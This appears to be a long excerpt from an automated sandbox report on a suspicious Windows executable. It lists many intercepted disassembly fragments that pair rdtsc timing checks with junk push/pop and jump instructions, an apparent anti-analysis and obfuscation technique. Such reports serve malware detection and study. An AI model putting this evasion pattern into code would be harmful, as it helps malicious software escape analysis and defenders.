              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70E270 second address: 70E283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FCD7C4F0D96h 0x0000000d jne 00007FCD7C4F0D96h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70E283 second address: 70E296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCD7D2AFB0Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E3408 second address: 6E3437 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sbb ch, 0000004Ah 0x0000000c lea eax, dword ptr [ebp+1247F15Bh] 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FCD7C4F0DA8h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E3437 second address: 6E343B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E343B second address: 6E3441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E3441 second address: 6C0749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCD7D2AFB0Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e ja 00007FCD7D2AFB12h 0x00000014 ja 00007FCD7D2AFB0Ch 0x0000001a jng 00007FCD7D2AFB06h 0x00000020 nop 0x00000021 sub edi, 79B88C04h 0x00000027 call dword ptr [ebp+122D33D0h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push edx 0x00000030 jng 00007FCD7D2AFB06h 0x00000036 pop edx 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E35EE second address: 6E35F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E35F4 second address: 6E35F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E3890 second address: 6E3896 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E3A3C second address: 6E3A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E3A40 second address: 6E3A60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FCD7C4F0DA3h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E3E69 second address: 6E3EC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FCD7D2AFB08h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov ecx, dword ptr [ebp+122D3548h] 0x0000002c js 00007FCD7D2AFB0Ah 0x00000032 mov dx, 1F41h 0x00000036 push 00000004h 0x00000038 xor dword ptr [ebp+122D1BEFh], esi 0x0000003e nop 0x0000003f pushad 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E3EC5 second address: 6E3ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E3ECB second address: 6E3EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E4345 second address: 6E434B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E434B second address: 6E434F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E434F second address: 6E439A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FCD7C4F0D98h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 adc edx, 55462EF3h 0x0000002b mov edx, ebx 0x0000002d push 0000001Eh 0x0000002f mov dword ptr [ebp+1246EE3Eh], edi 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 je 00007FCD7C4F0D98h 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E44AF second address: 6E44B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E4615 second address: 6E4619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E4619 second address: 6E4623 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E46C8 second address: 6E4747 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FCD7C4F0DA9h 0x00000013 jp 00007FCD7C4F0D96h 0x00000019 popad 0x0000001a jnp 00007FCD7C4F0D9Ch 0x00000020 jns 00007FCD7C4F0D96h 0x00000026 popad 0x00000027 nop 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007FCD7C4F0D98h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov cl, D5h 0x00000044 lea eax, dword ptr [ebp+1247F15Bh] 0x0000004a pushad 0x0000004b mov edi, 5958259Fh 0x00000050 mov ecx, dword ptr [ebp+122D20E4h] 0x00000056 popad 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a push edi 0x0000005b jmp 00007FCD7C4F0D9Ch 0x00000060 pop edi 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6E4747 second address: 6C1350 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jc 00007FCD7D2AFB08h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop esi 0x00000014 nop 0x00000015 and ecx, dword ptr [ebp+122D1CD4h] 0x0000001b call dword ptr [ebp+12448774h] 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FCD7D2AFB12h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6C1350 second address: 6C135C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70E752 second address: 70E758 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70E8BF second address: 70E8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70E8C3 second address: 70E90A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007FCD7D2AFB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FCD7D2AFB11h 0x00000012 pop esi 0x00000013 push edi 0x00000014 je 00007FCD7D2AFB06h 0x0000001a pop edi 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FCD7D2AFB19h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70E90A second address: 70E910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70E910 second address: 70E914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70E914 second address: 70E91A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70E91A second address: 70E92A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCD7D2AFB12h 0x00000008 jno 00007FCD7D2AFB06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70EA71 second address: 70EA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70EBF2 second address: 70EBF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70ED5B second address: 70ED76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA0h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70ED76 second address: 70EDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007FCD7D2AFB14h 0x00000016 pop ebx 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 714EEC second address: 714EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 69B966 second address: 69B96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 69B96C second address: 69B97F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCD7C4F0D9Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 713D84 second address: 713D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCD7D2AFB06h 0x0000000a jng 00007FCD7D2AFB06h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 713D9B second address: 713DBD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCD7C4F0DA6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 713DBD second address: 713DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 713DC1 second address: 713DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 713F4D second address: 713F7C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FCD7D2AFB06h 0x00000011 push esi 0x00000012 pop esi 0x00000013 jns 00007FCD7D2AFB06h 0x00000019 jmp 00007FCD7D2AFB15h 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 713F7C second address: 713F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 7148FB second address: 714935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCD7D2AFB14h 0x0000000b jne 00007FCD7D2AFB06h 0x00000011 jo 00007FCD7D2AFB06h 0x00000017 jo 00007FCD7D2AFB06h 0x0000001d popad 0x0000001e pushad 0x0000001f jmp 00007FCD7D2AFB0Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 71A042 second address: 71A048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 71A048 second address: 71A04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 71A04C second address: 71A050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 71A050 second address: 71A065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCD7D2AFB0Bh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 71F48A second address: 71F48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 71F723 second address: 71F727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 71F869 second address: 71F86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 71F86F second address: 71F89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB0Ah 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jng 00007FCD7D2AFB1Eh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 7208AA second address: 7208AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 7208AE second address: 7208E4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCD7D2AFB0Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jng 00007FCD7D2AFB06h 0x00000014 pop eax 0x00000015 push edx 0x00000016 jmp 00007FCD7D2AFB18h 0x0000001b pop edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 7208E4 second address: 7208E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 72438F second address: 724399 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 7267A5 second address: 7267AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 7267AB second address: 7267B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7267B3 second address: 7267B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 729069 second address: 72906F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 72906F second address: 729074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 729364 second address: 72938B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FCD7D2AFB0Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FCD7D2AFB0Fh 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 72938B second address: 729391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 729391 second address: 7293AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FCD7D2AFB11h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7293AD second address: 7293BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jnl 00007FCD7C4F0D9Ah 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7293BE second address: 7293D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCD7D2AFB0Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 72D893 second address: 72D8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7C4F0DA0h 0x00000009 jmp 00007FCD7C4F0D9Ah 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 72DF71 second address: 72DF75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 730D62 second address: 730D6E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCD7C4F0D96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 731069 second address: 73106D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 73106D second address: 73107B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FCD7C4F0D9Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 73107B second address: 73107F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 73107F second address: 731087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 731087 second address: 73108B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7370BE second address: 7370C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7370C4 second address: 7370C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7370C9 second address: 737105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FCD7C4F0D96h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FCD7C4F0DA9h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FCD7C4F0DA3h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 737105 second address: 737109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 737109 second address: 737129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCD7C4F0DA6h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 737129 second address: 737133 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCD7D2AFB06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 735B27 second address: 735B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 735B2B second address: 735B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB12h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FCD7D2AFB0Ch 0x00000011 jnp 00007FCD7D2AFB06h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 735DBC second address: 735DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E41D0 second address: 6E4207 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCD7D2AFB08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop eax 0x00000013 nop 0x00000014 stc 0x00000015 mov ch, 70h 0x00000017 push 00000004h 0x00000019 mov edi, dword ptr [ebp+122D33BBh] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FCD7D2AFB11h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E4207 second address: 6E420B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E420B second address: 6E4211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
